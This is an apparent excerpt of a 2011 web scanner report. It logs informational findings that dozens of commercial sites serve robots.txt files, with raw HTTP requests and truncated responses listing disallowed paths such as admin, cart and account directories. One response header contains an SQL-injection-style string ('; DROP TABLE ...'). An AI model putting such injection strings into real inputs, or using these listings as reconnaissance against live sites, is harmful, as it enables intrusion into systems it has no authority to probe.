Content-Type: text/plain
Content-Length: 83
Vary: Accept-Encoding
Connection: close

User-agent: *
Disallow: /pageView/
Disallow: /pageView/htmlreader/
Crawl-delay: 10
24.686. http://www.quotegarden.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.quotegarden.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.quotegarden.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:59:07 GMT
Server: Apache
Last-Modified: Tue, 14 Sep 2010 01:51:30 GMT
Accept-Ranges: bytes
Content-Length: 213
Connection: close
Content-Type: text/plain

User-agent: Mediapartners-Google*
Disallow:

User-agent: *
Disallow: /cgi-bin/
Disallow: /wwwstat/
Disallow: /webmail/
Disallow: /cpanel

User-agent: ia_archiver
Disallow: /

User-agent: AboutUsBot
...[SNIP]...
24.687. http://www.qwest.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.qwest.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.qwest.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:36:30 GMT
Server: Apache
Set-Cookie: TLTHID=3777B7FE5D2E105D0016DAF664787EDF; Path=/; Domain=.qwest.com
Set-Cookie: TLTSID=3777B7FE5D2E105D0016DAF664787EDF; Path=/; Domain=.qwest.com
Last-Modified: Mon, 15 Nov 2010 15:57:06 GMT
Accept-Ranges: bytes
Content-Length: 5557
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

# Robots.txt -- robot exclusions
#
# See http://www.robotstxt.org/wc/norobots.html for details of the standard.
#
# *DO NOT MODIFY* this file without giving prior notification of the Online
# Customer
...[SNIP]...
24.688. http://www.radioshack.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.radioshack.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.radioshack.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:43:13 GMT
Server: Apache/2.0.63 (Unix)
Last-Modified: Mon, 03 Nov 2008 08:31:55 GMT
ETag: "4d8395-11c-45ac4c78f74c0"
Accept-Ranges: bytes
Content-Length: 284
Cache-Control: max-age=172800
Expires: Mon, 04 Apr 2011 13:43:13 GMT
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow: /cart/
Disallow: /coreg/
Disallow: /compare/
Disallow: /include/
Disallow: /emailHandler/
Disallow: /graphics/
Disallow: /css/
Disallow: /emergency/
Disallow: /images/
...[SNIP]...
24.689. http://www.rawtube.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rawtube.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.rawtube.com

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 22 Apr 2010 22:33:15 GMT
ETag: "9473-549-484dae580c0c0"
Content-Type: text/plain; charset=UTF-8
Content-Length: 1353
Via: www.rawtube.com
Date: Sat, 02 Apr 2011 12:32:31 GMT
X-Varnish: 863747473 863566912
Age: 712
Via: 1.1 varnish
Connection: close

# Robots.txt file by the great one
#
User-agent: *
Disallow: /free_lifetime_membership_fs.php
Disallow: /free_lifetime_membership.php
Disallow: /limit.php
Disallow: /2257.html
Disallow: /foreig
...[SNIP]...
24.690. http://www.reachlocal.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.reachlocal.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.reachlocal.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:58:35 GMT
Server: Apache
Last-Modified: Fri, 15 Oct 2010 22:21:23 GMT
ETag: "6c5-492af3f227ec0"
Accept-Ranges: bytes
Content-Length: 1733
Cache-Control: max-age=1209600
Expires: Sat, 16 Apr 2011 13:58:35 GMT
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Content-Type: text/plain

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...
24.691. http://www.realage.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.realage.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.realage.com

Response

HTTP/1.0 200 OK
Server: Apache
Content-Length: 673
Content-Type: text/plain
Cache-Control: max-age=524
Date: Sat, 02 Apr 2011 13:34:44 GMT
Connection: close

User-agent: *
Crawl-delay: 20
Disallow: /ams/
Disallow: /admin/
Disallow: /cgi-bin/
Disallow: /contribute/
Disallow: /comments/
Disallow: /registration/
Disallo
...[SNIP]...
24.692. http://www.realsimple.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.realsimple.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.realsimple.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:44:09 GMT
Server: Apache
Last-Modified: Fri, 06 Feb 2009 17:38:19 GMT
ETag: "424115-e6-462437c9038c0"
Accept-Ranges: bytes
Content-Length: 230
Content-Type: text/plain
Vary: X-Catmap-Header
P3P: CP='PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA PRE CUR ADMa DEVa TAIo PSAo PSDo IVAo IVDo CONo TELo OTPi OUR UNRo PUBi OTRo IND DSP CAO COR'
Connection: close

Sitemap: http://www.realsimple.com/realsimple_sitemap.index
User-agent: *
Disallow: http://cgi.timeinc.net/cgi-bin/mail/dnp/privacy_centralized.cgi/realsimple?dnp_source=E
Disallow: https://secure.cus
...[SNIP]...
24.693. http://www.realtor.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.realtor.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.realtor.com

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Connection: keep-alive
Date: Sat, 02 Apr 2011 13:33:03 GMT
Content-Type: text/plain
Accept-Ranges: bytes
Last-Modified: Thu, 17 Feb 2011 18:24:38 GMT
ETag: "03763efcfcecb1:dd5"
Content-Length: 2716

User-agent: *
Disallow: /app_data
Disallow: /app_data/
Disallow: /App_Data
Disallow: /App_Data/
Disallow: /assist
Disallow: /assist/
Disallow: /Assist/
Disallow: /Assist
Disallow: /diagnostic
...[SNIP]...
24.694. http://www.redbox.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redbox.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.redbox.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Wed, 23 Mar 2011 18:00:37 GMT
Accept-Ranges: bytes
ETag: "396c893684e9cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 103
Date: Sat, 02 Apr 2011 13:39:36 GMT
Connection: close

...User-agent: *
Disallow: /account
Disallow: /feeds
Disallow: /cart
Allow: /

Crawl-delay: 5

24.695. http://www.reddit.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.reddit.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.reddit.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Tue, 04 Jan 2011 21:54:18 GMT
ETag: 1294178058.0-400
Server: '; DROP TABLE servertypes; --
Date: Sat, 02 Apr 2011 13:25:31 GMT
Content-Length: 400
Connection: close

# 80legs
User-agent: 008
Disallow: /

# MSNBot
User-Agent: msnbot
Crawl-Delay: 20

User-Agent: bender
Disallow: /my_shiny_metal_ass

User-Agent: Gort
Disallow: /earth

User-Agent: *
Disallow: /api
Dis
...[SNIP]...
24.696. http://www.redorbit.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redorbit.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.redorbit.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:34:39 GMT
Server: Apache
Last-Modified: Tue, 01 Mar 2011 13:49:47 GMT
Accept-Ranges: bytes
Content-Length: 234
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=UTF-8

User-Agent: *
Allow: /
Disallow: /modules/yellowbrix
Disallow: /modules/edit
Disallow: /modules/news/tools.php
Disallow: /modules/imglib/download.php
Disallow: /news/archive/
Sitemap: http://www.redor
...[SNIP]...
24.697. http://www.reference.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.reference.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.reference.com

Response

HTTP/1.0 200 OK
Server: Apache
Content-Type: text/plain;charset=UTF-8
Date: Sat, 02 Apr 2011 12:37:38 GMT
Content-Length: 602
Connection: close

User-agent: Googlebot
Disallow:

User-agent: googlebot-image
Disallow:

User-agent: googlebot-mobile
Disallow:

User-agent: MSNBot
Disallow:

User-agent: Slurp
Disallow:

User-agen
...[SNIP]...
24.698. http://www.regions.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.regions.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.regions.com

Response

HTTP/1.1 200 OK
Set-Cookie: www.regions.com-http=R1402660298; path=/
Content-Length: 41
Content-Type: text/plain
Last-Modified: Fri, 01 Aug 2008 19:11:07 GMT
Accept-Ranges: bytes
ETag: "7727255aaf4c81:8ecc"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:34:34 GMT
Connection: close

User-agent: *
Disallow: \VirtualMedia\
24.699. http://www.registrydefender.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.registrydefender.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.registrydefender.com

Response

HTTP/1.1 200 OK
Content-Length: 163
Content-Type: text/plain
Last-Modified: Thu, 29 Jan 2009 20:57:11 GMT
Accept-Ranges: bytes
ETag: "c0df1d285482c91:1c36"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:55:46 GMT
Connection: close

User-agent: *
Disallow: /l/
Disallow: /c/
Disallow: /n/
Disallow: /charge/
Disallow: /reglanding/
Disallow: /include/

User-agent: ia_archiver
Disallow: /
24.700. http://www.rei.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rei.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.rei.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 08 Mar 2011 21:39:01 GMT
Cache-Control: public, max-age=600, must-revalidate
Expires: Wed, 30 Mar 2011 16:21:32 GMT
P3P: policyref="http://www.rei.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMi TAIi IVDo CONo OUR DELa SAMo STP PHY PUR COM NAV INT STA PRE GOV"
Content-Type: text/plain;charset=UTF-8
Content-Language: en-US
Date: Sat, 02 Apr 2011 13:55:41 GMT
Content-Length: 1136
Connection: close

User-agent: *
Disallow: /email/
Disallow: /EmployeeNewsletter/
Disallow: /gearmail/
Disallow: /jspConfig/
Disallow: /kiosk/
Disallow: /test/
Disallow: /ShoppingCart*
Disallow: /YourAccountLogi
...[SNIP]...
24.701. http://www.rent.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rent.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.rent.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:34:40 GMT
Server: Apache
Set-Cookie: session=2fee3a9e0958bb30e0a34d055a73b111/1301751280/10675a96f6bab8dca7d100c9c76392d7; domain=.rent.com; path=/
Set-Cookie: RD=; path=/; expires=Sat, 02-Apr-2011 13:35:10 GMT
Cache-Control: must-revalidate
Expires: Sat, 02 Apr 2011 13:34:41 GMT
Set-Cookie: browser=1.2540130175128050; path=/; expires=Tue, 30-Mar-21 13:34:40 GMT; domain=.rent.com
P3P: CP='ALL DSP COR CUR ADMa DEVa TAIa PSAa PSDa CONo OUR IND PHY ONL UNI COM NAV INT STA'
Content-Type: text/plain; charset=utf-8
X-Cache: MISS from www.rent.com
Connection: close

Sitemap: http://www.rent.com/sitemap_index.xml.gz
User-agent: *
Disallow: /ajax/
Disallow: /base/
Disallow: /common/
Disallow: /email/
Disallow: /go/
Disallow: /guest/
Disallow: /java/
Disallow: /java
...[SNIP]...
24.702. http://www.rentals.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rentals.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.rentals.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:14:14 GMT
Server: PWS/1.7.1.5
X-Px: ms iad-agg-n35 ( iad-agg-n34), ht-d iad-agg-n34.panthercdn.com
Cache-Control: max-age=3600
Expires: Sat, 02 Apr 2011 14:29:25 GMT
Age: 2689
Content-Length: 804
Content-Type: text/plain
Last-Modified: Thu, 31 Mar 2011 11:25:21 GMT
X-Varnish: 1737498056
X-Cache: MISS
Connection: close

User-agent: Mediapartners-Google*
Disallow:

User-Agent: *

#
# Sitemap Global Ping (Google, Yahoo, MSN, Ask)
#
SITEMAP: http://www.rentals.com/sitemap.xml

#
# Utility Pages Exclusion
#
Disallow: /Ma
...[SNIP]...
24.703. http://www.reply.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.reply.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.reply.com

Response

HTTP/1.1 200 OK
Content-Length: 65
Content-Type: text/plain
Last-Modified: Fri, 28 Aug 2009 16:46:46 GMT
Accept-Ranges: bytes
ETag: "70d76221ff27ca1:17cf"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:39:43 GMT
Connection: close

User-agent: *
Disallow: /autos/
Disallow: /clicks/
Disallow:
24.704. http://www.retailmenot.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.retailmenot.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.retailmenot.com

Response

HTTP/1.1 200 OK
Content-Type: text/html
Date: Sat, 02 Apr 2011 13:33:05 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.6-1+lenny9
Content-Length: 565
Connection: Close

User-agent: *
Disallow: /ajax/
Disallow: /ajax/geoLocate.php
Disallow: /comment.php
Disallow: /savings.php
Disallow: /coupons/blank-default
Disallow: /out/
Disallow: /out2/
Disallow: /printable/out/
D
...[SNIP]...
24.705. http://www.retrevo.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.retrevo.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.retrevo.com

Response

HTTP/1.1 200 OK
ETag: W/"15024-1296151686000"
Last-Modified: Thu, 27 Jan 2011 18:08:06 GMT
Content-Type: text/plain
Content-Length: 15024
Date: Sat, 02 Apr 2011 13:38:23 GMT
Server: Apache-Coyote/1.1
Connection: close

Sitemap: http://www.retrevo.com/sitemap.xml

User-agent: LucidMedia
Crawl-delay: 10

User-agent: voyager/1.0
Disallow: /

User-agent: *
Disallow: /search
Disallow: /m/
Disallow: /n/vm/
Dis
...[SNIP]...
24.706. http://www.reuters.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.reuters.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.reuters.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:32:55 GMT
Server: Apache
Expires: Sat, 2 Apr 2011 13:28:19 GMT
Content-Length: 197
Age: 275
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain;charset=UTF-8

User-agent: *
Disallow: /finance/stocks/option
Disallow: /finance/stocks/financialHighlights
Disallow: /search
SITEMAP: http://www.reuters.com/sitemap_news_index.xml

User-agent: Pipl
Disallow: /

24.707. http://www.ripoffreport.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ripoffreport.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ripoffreport.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 02 Apr 2011 14:16:42 GMT
Content-Type: text/plain; charset=win-utf
Connection: close
Last-Modified: Tue, 02 Mar 2010 18:08:20 GMT
ETag: "2ea2555733baca1:0"
ROR-NODE: 12
Content-Length: 349
Accept-Ranges: bytes

User-agent: *
Disallow: /Common/
Disallow: /Register.aspx
Disallow: /PageNotFound.aspx
Disallow: /ForgotPassword.aspx
Disallow: /CreateAccount.aspx
Disallow: /CreateUserAccount.aspx
Disallow: /
...[SNIP]...
24.708. http://www.riteaid.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.riteaid.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.riteaid.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:53:09 GMT
Server: IBM_HTTP_Server
Last-Modified: Mon, 11 Sep 2006 14:30:56 GMT
ETag: "430075-66-67eb0800"
Accept-Ranges: bytes
Content-Length: 102
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /secure/
Disallow: /sitesearch/
Disallow: /redir/
Disallow: /stores/locator/

24.709. http://www.rivals.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rivals.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.rivals.com

Response

HTTP/1.1 200 OK
Content-Length: 177
Content-Type: text/plain
Last-Modified: Fri, 23 Sep 2005 18:39:08 GMT
Accept-Ranges: bytes
ETag: "0eeed146ec0c51:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:46:27 GMT
Connection: close

User-agent: * # directed to all robots
Disallow: /offendeduser.asp
Disallow: /events.asp
Disallow: /prayerlist.asp
Disallow: /stoCheckoutPage1.asp
Disallow: /stoCart.asp
24.710. http://www.rollingstone.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rollingstone.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.rollingstone.com

Response

HTTP/1.0 200 OK
X-Powered-By: PHP/5.3.3
Content-Type: text/html; charset=utf-8
Server: Apache (Unix;)
Cache-Control: private, max-age=2951
Date: Sat, 02 Apr 2011 13:55:16 GMT
Content-Length: 79
Connection: close

User-agent: *
Disallow: /cms.php
Disallow: /preview.php
Disallow: /*?print=true
24.711. http://www.rotoworld.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rotoworld.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.rotoworld.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Tue, 15 Feb 2011 19:11:46 GMT
Accept-Ranges: bytes
ETag: "2f58453044cdcb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 126
Expires: Sat, 02 Apr 2011 13:58:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:58:31 GMT
Connection: close

User-agent: *
Disallow: /zcomponents
Disallow: /js
Disallow: /services
Disallow: /controls
Disallow: /zlibs
Allow: /

24.712. http://www.rottentomatoes.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rottentomatoes.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.rottentomatoes.com

Response

HTTP/1.0 200 OK
Date: Sat, 02 Apr 2011 13:33:07 GMT
Server: Apache
Last-Modified: Thu, 31 Mar 2011 23:18:13 GMT
ETag: "af"
Accept-Ranges: bytes
Content-Length: 175
Cache-Control: max-age=86400
Expires: Sun, 03 Apr 2011 13:33:07 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: Mediapartners-Google
Disallow:

User-agent: *
Disallow: /license/export/
Disallow: /search
Disallow: /user/id

Sitemap: http://www.rottentomatoes.com/siteIndex.xml
24.713. http://www.roxwel.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.roxwel.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.roxwel.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:53:07 GMT
Server: Apache/2.2.16 (Unix)
Last-Modified: Wed, 21 Jan 2009 22:23:02 GMT
ETag: "51658d-4fc-4610599541d80"
Accept-Ranges: bytes
Content-Length: 1276
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

#For Google Adsense and Adwords Quality
User-agent: Mediapartners-Google
Disallow: /email/*
Disallow: /ms_asx/*
Disallow: /rmsmail/*
Disallow: /rate.php*
Disallow: /login.php*
Disallow: /titleb
...[SNIP]...
24.714. http://www.rr.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rr.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.rr.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:25:54 GMT
Server: Apache
Last-Modified: Wed, 16 Feb 2011 05:08:44 GMT
ETag: "533f-17-4669af00"
Accept-Ranges: bytes
Content-Length: 23
Keep-Alive: timeout=3, max=385
Connection: Keep-Alive
Content-Type: text/plain

User-agent: *
Disallow:
24.715. http://www.rss2search.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rss2search.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.rss2search.com

Response

HTTP/1.1 200 OK
Server: nginx/0.9.6
Date: Sat, 02 Apr 2011 13:42:19 GMT
Content-Type: text/plain
Content-Length: 35
Last-Modified: Fri, 03 Dec 2010 18:15:04 GMT
Connection: close
Expires: Thu, 31 Dec 2037 23:55:55 GMT
Cache-Control: max-age=315360000
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Accept-Ranges: bytes

User-agent: *
Disallow: /delivery/
24.716. http://www.runescape.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.runescape.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.runescape.com

Response

HTTP/1.1 200 OK
Date: Sat, 02-Apr-2011 13:33:44 GMT
Server: JAGeX/3.1
Content-type: text/plain; charset=ISO-8859-1
Cache-control: no-cache
Pragma: no-cache
Expires: Thu, 01-Jan-1970 00:00:00 GMT
Connection: Close
Content-length: 37

User-agent: Googlebot
Disallow: /a=*/
24.717. http://www.sacbee.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sacbee.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sacbee.com

Response

HTTP/1.0 200 OK
Server: Apache/1.3.41
Last-Modified: Mon, 12 Jul 2010 21:19:37 GMT
ETag: "13e0dcb-3bb-4c3b86e9"
Content-Type: text/plain
Date: Sat, 02 Apr 2011 13:40:45 GMT
Content-Length: 955
Connection: close

# update log
# 2009-08-26 - kparker @ MI 727-7946968 added, then removed 1198 and newhomes.
# 209-01-29 - pbuckley @ MI added sitemap2 and sitemap3
# 2008-07-23 - pbuckley @ MI
# 2007/03/05 - rwm

Us
...[SNIP]...
24.718. http://www.safeway.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.safeway.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.safeway.com

Response

HTTP/1.0 200 OK
Server: IBM_HTTP_Server
Last-Modified: Tue, 10 Aug 2010 23:28:36 GMT
ETag: "65-42-7dfe7100"
Content-Type: text/plain
Date: Sat, 02 Apr 2011 14:14:53 GMT
Content-Length: 66
Connection: close

User-agent: *
Disallow: /justforu
Disallow: /IFL/Grocery/justforu
24.719. http://www.salesforce.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.salesforce.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.salesforce.com

Response

HTTP/1.0 200 OK
Server: SFDC
Last-Modified: Mon, 31 Jan 2011 09:38:26 GMT
Cache-Control: max-age=86400
Expires: Sun, 03 Apr 2011 06:53:17 GMT
Content-Type: text/plain; charset=UTF-8
Content-Length: 11688
Date: Sat, 02 Apr 2011 13:45:22 GMT
Connection: close

# Robots.txt file for http://www.salesforce.com
# rh_24_Aug_09
# All robots will spider the domain
#
sitemap: http://www.salesforce.com/sitemapindex.xml
#
# Keep mis-configured Microsoft SharePoint se
...[SNIP]...
24.720. http://www.salon.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.salon.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.salon.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:40:17 GMT
Server: Apache
Connection: close
Content-Type: text/plain; charset=UTF-8

#
# robots.txt for http://www.salon.com
#
# check out http://info.webcrawler.com/mak/projects/robots/norobots.html
# for more info on what this is all about.
#
User-agent: *
Crawl-delay: 5
Disallow: /
...[SNIP]...
24.721. http://www.samsclub.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.samsclub.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.samsclub.com

Response

HTTP/1.0 200 OK
Server: Apache
SamsHeader: EDC
forcelegacy: false
Last-Modified: Sun, 13 Mar 2011 08:44:05 GMT
ETag: "20c9-ce-49e593298df40"
Content-Type: text/plain
Cache-Control: max-age=1200
Date: Sat, 02 Apr 2011 13:38:34 GMT
Content-Length: 206
Connection: close
Set-Cookie: dcenv=EDC; path=/; domain=samsclub.com

# robots.txt generated for www.samsclub.com
User-agent: *
Disallow:
Disallow: /cgi-bin/
Disallow: /sams/checkout/
Disallow: /sams/account/
Disallow: /sams/cart/
Sitemap: http://www.samsclub.com/sitema
...[SNIP]...
24.722. http://www.savings.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.savings.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.savings.com

Response

HTTP/1.0 200 OK
Server: Resin/3.1.8
ETag: "5rkrQpyY/Kn"
Last-Modified: Fri, 01 Apr 2011 13:49:28 GMT
Accept-Ranges: bytes
Content-Type: text/plain
Content-Length: 268
Date: Sat, 02 Apr 2011 14:00:55 GMT
Connection: close

# All robots will spider the domain

User-agent: *
Disallow: /coupons/moreDeals.html
Disallow: /mpofferref
Disallow: /mpclick
Disallow: /twitterStatus.html
Disallow: /honeypot.html
Sitemap: http://www
...[SNIP]...
24.723. http://www.sbnation.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sbnation.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sbnation.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:33:46 GMT
Server: Apache
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa CONi OUR IND PHY ONL UNI COM NAV INT CNT STA"
Cache-Control: private, max-age=0, must-revalidate
Last-Modified: Tue, 15 Mar 2011 11:45:39 GMT
ETag: "7c194b-d0-49e83f7a3149b"
Accept-Ranges: bytes
Content-Length: 208
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file

User-agent: *
Disallow: /admin
Disallow: /newfanshot
Disallow: /search
Disallow: /account
Disallow:
...[SNIP]...
